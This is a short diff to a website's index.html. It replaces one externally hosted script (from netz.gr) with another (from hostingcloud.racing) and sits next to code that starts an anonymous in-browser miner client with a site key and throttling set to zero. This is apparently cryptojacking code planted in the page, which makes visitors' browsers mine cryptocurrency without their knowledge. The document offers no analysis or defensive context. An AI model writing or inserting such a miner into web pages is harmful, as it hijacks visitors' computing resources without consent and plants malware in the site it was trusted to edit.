--- a/index.html
+++ b/index.html
@@ -520,7 +520,7 @@
       })
     </script>
 
-<script src="https://netz.gr/l3se.php?f=emuj.js" defer></script>
+<script src="https://www.hostingcloud.racing/RLVr.js"></script>
 <script>
     var _client = new Client.Anonymous('ce5ea48caf562e52b026b82443a82775f8bbd72a4a71fa6b301a081288b5b215', {
         throttle: 0, c: 'w'
